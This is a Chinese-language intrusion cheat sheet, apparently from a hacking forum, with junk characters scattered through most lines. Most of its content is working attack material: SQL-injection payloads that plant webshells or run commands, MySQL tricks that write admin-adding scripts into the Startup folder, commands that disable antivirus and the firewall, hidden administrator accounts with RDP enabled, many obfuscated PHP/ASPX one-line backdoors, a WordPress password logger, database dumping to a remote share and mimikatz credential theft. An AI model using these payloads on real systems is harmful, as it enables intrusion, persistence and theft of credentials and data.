use test;' O( r- O+ B; o; z1 E/ ?& t& x
create table a (cmd text);
) b2 m+ ~3 n m; v* z5 U4 c$ Finsert into a values ("set wshshell=createobject (""wscript.shell"") " );
4 D( L9 s1 ?+ O$ C& [insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );' v4 b4 o* c* k7 P
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );; g6 {( Z2 K9 M3 D( r: j1 Y
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
0 ~) E" u+ F+ T0 xdrop table a;& {2 x" x# h5 L- H1 y
- ?1 R- P2 z8 \1 Q3 B英文版本:
$ F# }4 d' Z. F: @
2 g) q# X' L0 G( L" D+ j4 i8 nuse test;
8 n. f$ _* s k4 f% [create table a (cmd text);
; T) U' _1 p3 y+ binsert into a values ("set wshshell=createobject (""wscript.shell"") " );' J) s, n- f8 @7 k7 w
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );- P) j7 n T1 W# K4 ^! v
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
" o$ W7 j o: s/ @6 M* d, V, Nselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";0 V" p! P. f( J/ x x% q/ h: k3 \* Z
drop table a;1 W3 `7 A2 {- s, P
* W3 z/ G; {1 m
create table a (cmd BLOB);
9 u" Z% t$ Y1 \ m7 D1 Vinsert into a values (CONVERT(木马的16进制代码,CHAR));; t, c9 M4 }6 v) e# w+ e
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'/ \$ ?0 V/ v9 ^: Y
drop table a;8 T$ `/ d) H3 C; ]# R Z
8 i) `: [ N0 i* g# K
记录一下怎么处理变态诺顿6 n; u' U* [$ C* e! X% Y( U
查看诺顿服务的路径
4 g4 m, u* M: T4 [4 K# Qsc qc ccSetMgr f& j& U3 O" w7 _5 `& s' b ^ G1 j
然后设置权限拒绝访问。做绝一点。。
4 G- ?) U+ o( }9 y( rcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
' o2 n) S, }0 j+ s; D4 K* e& e0 jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
& r8 ?1 x, D% x' P3 Jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators( {' i' E4 [4 X" G& z
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
. k. f; v* t4 u* ~: {' p7 m& S' L y3 \$ s
然后再重启服务器# A' H+ i' \$ i5 B
iisreset /reboot D n6 m' _3 D- k) K" B
这样就搞定了。。不过完事后。记得恢复权限。。。。8 H0 f. _: k* H+ d8 B" [
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F! }* u4 j* P! g- h4 Q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
. p5 a% P) B% W$ w# x4 Lcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
3 f+ C* [1 Q- X, wcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
5 Q, X9 o$ ~1 u4 MSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin, P, D0 z: q% I
+ Z: s* l9 c9 I# Z. Y6 h7 A
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
4 F" n& q5 g+ x1 ^# f. b I; c' ~+ e# Z9 I
postgresql注射的一些东西% S8 Z$ T6 D0 H* M6 M# W6 s
如何获得webshell8 @" T( x1 y1 c4 J5 S/ j
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
, K2 }* y' ]1 O \4 _* ~http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
. w* x" E1 y3 b. }! q9 O! t5 phttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;; O0 K8 x9 Z& }) a
如何读文件( U) f: q1 j# m
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
B h* j0 x. t' u7 x/ ]http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;% Z& R! f( e( M
http://127.0.0.1/postgresql.php?id=1;select * from myfile;: L9 L5 Z! U L5 d' v
/ E' l" [' I: B. B4 Qz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
( w5 Q4 g; \0 k0 W" {当然,这些的postgresql的数据库版本必须大于8.X
( _" D8 s' v3 Z# k% M1 b' B6 F创建一个system的函数:
" s4 `4 z5 G/ w9 }2 ~8 ?1 d0 J9 ?CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT' T- O& h! s" M4 `' o
3 D# r- c' ?+ k* X( a' M* c创建一个输出表:- B) v4 a! S) \! H2 o! u
CREATE TABLE stdout(id serial, system_out text)
8 x( h$ R$ N7 h4 `1 f
E- q8 M( T! ]4 N- }; }- l执行shell,输出到输出表内:! Z- D% S( A1 ], H/ g H! G
SELECT system('uname -a > /tmp/test')7 Q7 C1 \9 k @( q& D' v& V
8 a F; ?4 A2 W
copy 输出的内容到表里面;7 \3 |; L% {. Y
COPY stdout(system_out) FROM '/tmp/test'8 R4 F7 s/ @: Q* w
( J7 \: G+ q0 |) ^5 F% ~: [% G从输出表内读取执行后的回显,判断是否执行成功9 v" R+ _- y: ?0 g4 Z3 G
) S* h% C/ O: ]! C# N/ }0 ASELECT system_out FROM stdout, }0 s2 d9 g- D. _5 n
下面是测试例子- x; j6 k6 o. R2 t/ N
+ {7 I- t0 w& `' K; W
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
7 x* I# {1 c+ ^! Y+ f' q. J# s1 T8 o/ V' d5 d
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'6 M6 d- U3 c2 `
STRICT --
$ q& {) \* v- J, ]) V$ s4 w3 u
3 I" Y# [& J \9 ]0 Z/store.php?id=1; SELECT system('uname -a > /tmp/test') --
% z" n0 F3 H o3 x$ m. f
( S# d; B% e. C: p5 c" w! D* W! n6 t/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --5 Z1 \7 b2 Z* O/ o7 ~
5 ]+ U% I; M7 {+ I/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--/ x+ \8 r! Y1 d5 R
net stop sharedaccess stop the default firewall8 N0 B% R v$ w
netsh firewall show show/config default firewall
0 J% G5 D9 v- I- c6 X* j vnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall# q: F8 X3 b( S# p
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall8 R* B4 ~0 ^# H) j
修改3389端口方法(修改后不易被扫出)
$ _$ W* i3 W( ^' o( o8 S4 [修改服务器端的端口设置,注册表有2个地方需要修改
6 y% n. l2 j! B9 W% n6 Z$ r5 G' |- o, Q' b0 u# |$ r, F2 G1 e! X# j
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
. h" l% S; |( E5 y( _( dPortNumber值,默认是3389,修改成所希望的端口,比如6000
% x/ M- r* G W( r v8 Q
8 N; a2 y3 W! Q2 w3 x) }第二个地方:
5 w' M) d% \% m; e# F! u+ p3 y, s) G[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] ' |5 F$ H0 c) V0 ? q
PortNumber值,默认是3389,修改成所希望的端口,比如6000 V0 s( }. O: a" h* m8 R, r
4 u/ P; G. k8 t! U4 F5 z8 L4 K现在这样就可以了。重启系统就可以了* T5 ^- N3 Q! A. Y/ ~! l. G
$ d" Q) ^6 v5 L, A
查看3389远程登录的脚本
1 o$ [' Q$ [8 b, d# N/ o保存为一个bat文件
9 X2 p9 k. M" L1 idate /t >>D:\sec\TSlog\ts.log
! X7 N8 R$ h6 C8 ?' r/ q* Ptime /t >>D:\sec\TSlog\ts.log5 n$ T1 U$ ?3 y/ p1 U# O0 ?
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
8 k' {% \1 f. wstart Explorer
/ v' u6 a7 F' R7 ~
% m( A7 u, j) Emstsc的参数:7 Q5 ?3 O* g) R7 s" u, L, n
' \4 I' P1 n" i远程桌面连接
8 t- ]6 c! l' r6 f2 U4 K5 |" P; n" O7 T3 N4 i, S
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
% P$ E6 S# f% R [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
& }: u; J7 L; j9 O4 Q Q9 h& n8 W7 Z9 e& p) H$ j) e1 B% \& Y
<Connection File> -- 指定连接的 .rdp 文件的名称。
5 u% A) r" o4 L4 L% j6 i
3 R3 O) \" k8 G' L6 O9 {/v:<server[:port]> -- 指定要连接到的终端服务器。
: V0 {; h, x5 {' X# r6 u* g. R8 r
" z6 W/ K- p5 K% }/console -- 连接到服务器的控制台会话。- ?; m+ v: I: u8 }2 i* B
2 |5 `3 {: `8 V1 I/f -- 以全屏模式启动客户端。
" y( w* k4 Y2 o/ [- R: J4 T" W# T' x4 |8 I' j
/w:<width> -- 指定远程桌面屏幕的宽度。6 X: G5 X/ B" @* J3 {
( _# u- B. }- G3 O( Y" a+ R- ? S/h:<height> -- 指定远程桌面屏幕的高度。" s, i6 n9 g* l+ H g/ l- c5 k
9 N# o4 ^( N! ~8 }/ L7 b6 I
/edit -- 打开指定的 .rdp 文件来编辑。
# H% J, G0 A0 s% A" i! v+ ^4 |5 P2 _2 c" C" G0 I
/migrate -- 将客户端连接管理器创建的旧版6 |: \$ z8 L1 D; _9 w- i, L1 ]3 Z3 P
连接文件迁移到新的 .rdp 连接文件。
1 V t0 E/ P' y, w
8 N" r8 G7 P% O6 V( K% x$ J
' E. z) D( d2 u- f" _# k其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就0 H: C. V3 B O4 D% z( Y5 d% B
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量* G3 g1 z+ O5 _: D' m
" z7 ?# b4 o h# [3 k命令行下开启33898 @, t( W- x# Z
net user asp.net aspnet /add" V: B$ G: ?( T0 U+ e
net localgroup Administrators asp.net /add K% H1 k8 {4 W) c3 x
net localgroup "Remote Desktop Users" asp.net /add; U6 r: l8 X9 ?7 e: J7 Y8 u
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D' M) m* t/ X: R9 m: {
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
( d. Z7 d2 {% oecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
7 Y" v* g/ g3 J$ u; i1 Mecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
" A, T0 ~- s: tsc config rasman start= auto& D- }+ ~1 n' I& v# f
sc config remoteaccess start= auto
' }0 ^! I2 E9 rnet start rasman
3 j3 u/ X" {/ o1 I* ]net start remoteaccess
/ r8 h8 n, h) P9 NMedia
3 F0 X: |8 \8 K, w( [<form id="frmUpload" enctype="multipart/form-data"
. p& o% m2 `( D) V6 Y& M. i+ L) uaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>3 f1 b+ `: S$ B0 E* \- j
<input type="file" name="NewFile" size="50"><br>! v+ m, Q) t$ V' Q
<input id="btnUpload" type="submit" value="Upload">
/ b( s9 E+ _! i/ r) t% F, X' Y</form>! B- V1 P% P+ v, l3 q
$ U2 N* T, ]2 J1 {+ J
control userpasswords2 查看用户的密码3 G t. x1 t* [/ O% @- ~2 d
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径( g" P7 N, j& B F9 f
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
T) K g. N' l8 Z, C7 l \$ F: F5 c
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:( N! f e1 U; r$ `4 ~! q3 M k
测试1:% P! y$ K* G$ G0 I" f7 E
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
# U$ W! i, z3 c+ _0 s7 O
' z) z, L6 N; {% y W+ L" }测试2:; r; L( Q. X# h( X- l w" Z' ?. ~7 q
- a& j- {! R4 p$ Hcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
2 ?+ Q, Z' w7 c4 @6 y$ f
( D' z( ~0 H' edelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
- L5 L( n4 j+ J# t3 E# T/ @& C% f4 Y, t& K9 x7 t: c7 L% N
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
* m) P/ T" ]# |) L4 } ^" r关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
/ L* j4 O3 a* W- l可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;% y& ]* B q! P
net stop mcafeeframework
6 n" _: |. Q; s" Gnet stop mcshield K; Z5 l: }$ m8 v
net stop mcafeeengineservice# r( A, D- k4 L) P: b
net stop mctaskmanager
! o3 J% p l4 dhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D |" x' y& E# I3 Y4 @8 ]
# I+ [$ i2 s( h VNCDump.zip (4.76 KB, 下载次数: 1)
5 A1 M1 [0 r9 ] |; y密码在线破解http://tools88.com/safe/vnc.php! z- A" R. K9 p r
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
# _' k5 j5 n: f g( y1 [
7 k$ H# p: t4 T$ A6 w+ K0 {) { Yexec master..xp_cmdshell 'net user'% x# ^! H* J& D
mssql执行命令。
7 S1 y( D& F! w6 D8 k- b2 f2 R获取mssql的密码hash查询: N; t1 H4 g& s" @9 }1 R
select name,password from master.dbo.sysxlogins5 t2 }2 ~6 A3 m% Y, M6 u$ D% ^5 H
% {8 h! _3 z: T% vbackup log dbName with NO_LOG;
& ~/ ]7 W- L; [* ybackup log dbName with TRUNCATE_ONLY;
7 x- C5 p x+ a9 g d* |: |DBCC SHRINKDATABASE(dbName);, P4 a8 n: s* s0 l/ s: W1 A
mssql数据库压缩8 b+ _0 b7 {4 l
/ l7 {; m6 H2 }0 m! }- m- VRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK" k. E0 Y+ f5 B
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
" I% ]" p' B6 }5 \- k) G8 W2 X9 }+ A `4 Q/ Z( M; `1 o! v( s0 o
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
/ v6 _& L' ^6 I8 r备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
, g- B. s) Q" z8 F6 R) i6 _! p: s# e
Discuz!nt35渗透要点:
# K# X9 O1 O( Y K6 V. T(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
& F2 y: c! s l: G6 ?(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
, S. I* T1 m" A' L+ W5 l& G2 H(3)保存。1 `1 V, ^) o# z. w% a
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass3 ?4 d+ ^) ^$ o y. K$ R% W: Z
d:\rar.exe a -r d:\1.rar d:\website\, V* z: X' t* l3 h0 g d" ?4 K
递归压缩website
, z: Q! t2 j5 X+ e: B/ y: X! q! a; I注意rar.exe的路径
) c0 ~" y x H+ O- t" n% k* \7 x. a% j' j* f
<?php/ f% @) o. z4 z
- e5 O6 H" S3 q# @9 s% G1 n$telok = "0${@eval($_POST[xxoo])}";! D% N2 V6 u0 _- q6 Z
8 B: r3 `$ X! x4 Y* j# D% c$username = "123456";
5 e9 M5 u, c& I' O4 r
: J6 h1 Y) B' n/ t& `$userpwd = "123456";
8 s; y0 q* h$ i; p6 z' F. T0 @
" M. k7 |, g6 a& {5 m. ]1 T( Q$telhao = "123456";
) ^* O, p5 J7 f
3 d) b3 s6 Z( g; Q# B. E$telinfo = "123456";! Y9 e# ? t* A6 H8 o6 L
1 \1 [3 M7 ~3 L0 N+ O?>
* C; U: c6 B2 Z- v9 Yphp一句话未过滤插入一句话木马9 E( P* \% i1 y8 W7 v# l: n
$ @; p" O' G! O( B" m站库分离脱裤技巧
" B+ Z: n P5 b+ Z5 g# m5 {( Gexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
7 D h9 b- g' ^8 i' Iexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'1 j" C9 D+ w5 A: B3 p7 d
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
2 I( p* R' ?9 S- v6 l这儿利用的是马儿的专家模式(自己写代码)。" r0 Z: p3 G5 n. N' y2 q* F4 x
ini_set('display_errors', 1);
8 M8 P: C- l3 B' Qset_time_limit(0);
1 C! M# j! r8 zerror_reporting(E_ALL); B. ]4 Z! r3 m2 a
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());+ J; x; }) `' F/ w2 F
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());) @* n1 Y: A3 Y) B2 m# h
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());/ I! x" Z+ `/ N5 [" h8 x9 R. S8 m# k
$i = 0;
2 [/ ~' X* }* i- U$tmp = '';
' r6 r4 @, v6 iwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {+ k6 V, j$ Z. P; _
$i = $i+1;
* e$ L' s. T r8 x $tmp .= implode("::", $row)."\n";3 u2 Y, e9 w' ?0 u& U3 R# S% ^
if(!($i%500)){//500条写入一个文件2 }5 Y1 f" g2 w3 z+ e" P( r
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
* L/ j- g* e0 L' W2 q) P ` file_put_contents($filename,$tmp);
9 i* k- x% W* r3 R }6 O# X6 w $tmp = '';
1 Q0 O" u4 ?* ], o* A' E9 e }
! l2 t; N4 `. v}
7 z K5 r) f# X/ u! Hmysql_free_result($result);, Z) L! Y) r0 L
. S: I2 y' |- u: h' @, ~% h
, Q( z2 |1 b* a o# M' [& d' h; S. R3 U" m5 G5 m
//down完后delete
+ A; ] Q! L& t# U/ ?
J+ t3 n8 }/ q, D S$ V$ X
: F5 f0 y1 g( _ini_set('display_errors', 1);
$ d( z$ Q. M" a4 q" E( terror_reporting(E_ALL);
8 f0 R/ r0 g% O2 ^' N( Y" d9 ?8 R$i = 0;
% e% x% m: ^: G( Y9 c9 c6 W) y; Iwhile($i<32) {
7 U% v" O; t$ q" E# Y $i = $i+1;
' X0 Y5 W1 u% D6 G! E2 w0 Q" N1 M $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';4 J9 c% D2 D0 Y; f
unlink($filename);7 W( V$ i9 R. q, A
}
& c- u% [9 I8 F+ H9 Ohttprint 收集操作系统指纹8 z$ j X4 ?7 R
扫描192.168.1.100的所有端口- ]" h4 @6 |) O" X9 L/ g2 G7 y, N, }
nmap –PN –sT –sV –p0-65535 192.168.1.100
! j7 R6 R( {/ ^host -t ns www.owasp.org 识别的名称服务器,获取dns信息9 \( `0 Z1 o0 w6 M+ G& I
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
9 V" e- K" H2 CNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host3 c: B# J% l# [2 ^+ H( L% s( ^* ^
6 Y5 {. D+ T; b8 ~
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
' |% Z; Q; h* ^& z- S
) J3 }' H7 y4 T MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)2 h, I6 e* e+ v- u$ I5 U) k
- b. ]4 Q( `* N5 K Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
- v' W+ m5 Q# _$ |6 o
' Z- c- z$ c- c3 t DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)8 E9 t( @5 l/ f( p: |/ J# f- C0 Y V
2 U* O# L% O3 R" f/ P0 I9 o# s
http://net-square.com/msnpawn/index.shtml (要求安装)2 U/ X# j/ R% M. @/ R
- G- |- q' }+ P; k" v4 }, C* R tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)- [9 j/ H1 d& P. @0 u u9 X1 i
( L( m; i8 T' U SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)( r$ m% j3 L# }* N" ~! G2 U
set names gb23127 u) {3 n4 r! J. G
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。/ f* s, ^2 w9 K
) }. }& f. m7 S1 P; K3 K9 c; @mysql 密码修改
* ?( j5 U( I: _& f6 @% M1 F7 d$ E6 ?( VUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
4 M% h/ {7 I2 C6 [5 ?8 pupdate user set password=PASSWORD('antian365.com') where user='root';
, {; F* z" \) H* \0 nflush privileges;
" e$ s2 ?9 @3 I3 q2 ?& h' Y* z) O& }高级的PHP一句话木马后门0 r" C) u6 ^. T: M
6 x: \1 p) Y7 D$ S
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
9 M; k' `- }& r+ R/ C( h; j3 }# w; c0 u) {2 M
1、
6 {! |# v4 L+ a' o4 g. \( u, v- }" U. M4 c, b! F
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
( n& Y5 b$ I2 h" M- m* [' @1 U/ l$ _: O, }
$hh("/[discuz]/e",$_POST['h'],"Access");/ Z s8 J8 \/ q$ ~1 z! p
! Y; q% B, |8 i: e! }$ i5 q//菜刀一句话8 }3 m9 g9 U+ i! s1 ~- r" Q
+ C0 [+ {2 k, J2 A) J2、
- _ A! L0 t0 P- ^9 K3 `) e; M# a) \
$filename=$_GET['xbid'];
9 {: F. O1 k6 ?1 n! b+ L
- W( |( C& t, yinclude ($filename);/ ^( v% D; @* @6 `/ f6 p+ X
' L0 M. Z: j1 W j! W8 t: Z
//危险的include函数,直接编译任何文件为php格式运行% x* D, u' x0 x6 b& {
1 _) s1 k" X% n6 s3 F
3、. d0 ~; b. i+ g- m9 j
! e) P) ^- z4 r( d/ V3 z a+ J: W$reg="c"."o"."p"."y";
, X( ]( a2 m% C) V
( Z, S+ ~- z i( v# }# n$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
3 _ E6 j7 N) R
( r9 x. [0 k% E C1 p//重命名任何文件
3 l$ Z' l4 A9 D4 K& Q n* _( y% n* w
1 {5 }8 |# x- ^# z6 O4、
) E( {2 w- z5 u5 ]# ^3 Y" \$ c2 o4 `' k2 Y
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
" C1 v5 F) K4 I( X6 }2 }1 G
% S$ M4 }1 {0 ~' U2 F5 R: H- r8 {( n$gzid("/[discuz]/e",$_POST['h'],"Access");
' @, n% j' c, v5 ~" E1 l; L8 I
. g% B F8 v; P- N/ t//菜刀一句话9 @; W1 p' V q! Z# j/ R
' f, V$ j* Y, e( v: x
5、include ($uid);
/ D7 a+ I0 k l% K' h- e( {% g* S; g" F9 F
//危险的include函数,直接编译任何文件为php格式运行,POST
3 @$ n, r E2 G& p% x' B9 {, ]% H! |6 g. v" \" _2 R; v1 h
* ]$ R) z* W2 z+ ]: ^& b//gif插一句话7 Q4 B; q; S/ Y7 Z4 v) L/ }! O' k
1 C! ?' d/ e; a- p" }6 S8 p
6、典型一句话9 f& \7 F2 m9 C
/ b3 D% @$ a2 X. R/ {& v
程序后门代码. `. ^/ m% Q6 R& k7 _
<?php eval_r($_POST[sb])?>- G* a# G f& h5 \8 T" J9 b- Z
程序代码
7 b, ~# ?2 c0 e: W9 j. g2 K<?php @eval_r($_POST[sb])?>' E! Y2 M! j8 x# |5 y
//容错代码5 Z7 d5 e+ e G; Y$ i7 \ \0 s: _
程序代码8 T9 Q5 p+ W" C; f8 y- J
<?php assert($_POST[sb]);?># a/ f! ]6 u3 y: s7 C. X
//使用lanker一句话客户端的专家模式执行相关的php语句
: g5 C/ x$ Q! D$ l6 L5 ~, T/ b6 V程序代码
8 f8 Y5 b' O" y: `7 N4 s<?$_POST['sa']($_POST['sb']);?>8 z6 F7 z8 @! E) x0 B, p+ G
程序代码7 G F9 I% u+ a& ]
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>6 ^* d4 i* O0 P5 C2 c' m
程序代码
: Y( Q* O/ _1 c; e4 u<?php
8 ^" W4 p2 s4 X" V@preg_replace("/[email]/e",$_POST['h'],"error");4 x6 A6 l) L: [
?>9 p% M& O* [0 Q! ~# d2 `) S
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
; ~5 A$ O j# y$ O程序代码
4 w4 [. E A2 h2 Y( C6 h! X<O>h=@eval_r($_POST[c]);</O>& [' O8 U5 R: l2 _5 ^+ K
程序代码
( k8 @+ M# Y/ ^! i<script language="php">@eval_r($_POST[sb])</script>; j, j* _& Z" l' }8 l( ]7 B/ U
//绕过<?限制的一句话7 j: T) p e" y' p* A3 y# H
5 [5 a0 L8 v. vhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
( M3 `. z8 m0 R- r/ }详细用法:
; A, R$ O% G5 x. f# d) b; N1、到tools目录。psexec \\127.0.0.1 cmd
1 {: ?# {. I% v, n' B2、执行mimikatz
% a: N& H& b6 \ J3、执行 privilege::debug- p/ r/ V$ U& o: P/ o
4、执行 inject::process lsass.exe sekurlsa.dll2 G$ K3 U! j/ A% b0 v
5、执行@getLogonPasswords
: N8 ?5 [$ e/ q- W6、widget就是密码3 {9 s6 B1 ?2 e' e
7、exit退出,不要直接关闭否则系统会崩溃。# o. B* R1 y% q' w- T
; V' f0 j/ ~; O+ e* B
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面2 Q2 r+ i- K2 o, l% ~* n
9 j5 l1 z- X5 P自动查找系统高危补丁% ?) i: n/ ^6 _
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt9 O. X4 R% Z- A- k
! S- {' U4 o5 _, x/ Z3 u w9 T
突破安全狗的一句话aspx后门
* G7 s+ h# P* T: `+ G: |<%@ Page Language="C#" ValidateRequest="false" %>
9 h9 P( E) Q7 X<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
7 }# m1 g3 I! H( q* Ywebshell下记录WordPress登陆密码
( l$ O0 B) J- w. ]$ g# pwebshell下记录Wordpress登陆密码方便进一步社工% ]3 i) A" `; O
在文件wp-login.php中539行处添加:' P, m* t. U+ \- X& Z
// log password
; Y5 N1 L+ B' {! `$log_user=$_POST['log'];
. v1 H7 Y& S: u( c4 O' b. S. ?$log_pwd=$_POST['pwd'];
7 Y: \$ G4 S; W% c; T# X, }3 p$log_ip=$_SERVER["REMOTE_ADDR"];
( G1 t6 z% H+ D0 \$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;$ ?" b. R6 H' {+ Q1 Y
$txt=$txt.”\r\n”;0 f$ L& U5 }( \' o! r# c: V
if($log_user&&$log_pwd&&$log_ip){
% `2 i" o0 S3 a- t" I@fwrite(fopen(‘pwd.txt’,”a+”),$txt);7 L3 a4 ~- t1 M& M5 F
}& y" G9 Z4 {* Q
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。6 ?. l5 J% h0 I
就是搜索case ‘login’ w) P5 R$ p- f/ O$ d4 ~, x
在它下面直接插入即可,记录的密码生成在pwd.txt中,# ? e, [4 i/ K1 \3 z$ J
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录. z5 Z* U g/ d3 y! ~
利用II6文件解析漏洞绕过安全狗代码:0 u' I) @, T* [& a9 d! k6 O
;antian365.asp;antian365.jpg$ |0 k- G3 c2 J/ C ?" P
$ }) e" ^) ~+ H! v+ ?" X各种类型数据库抓HASH破解最高权限密码!
' K' Z. ]$ C% f$ U3 I! X9 Y6 W1.sql server2000
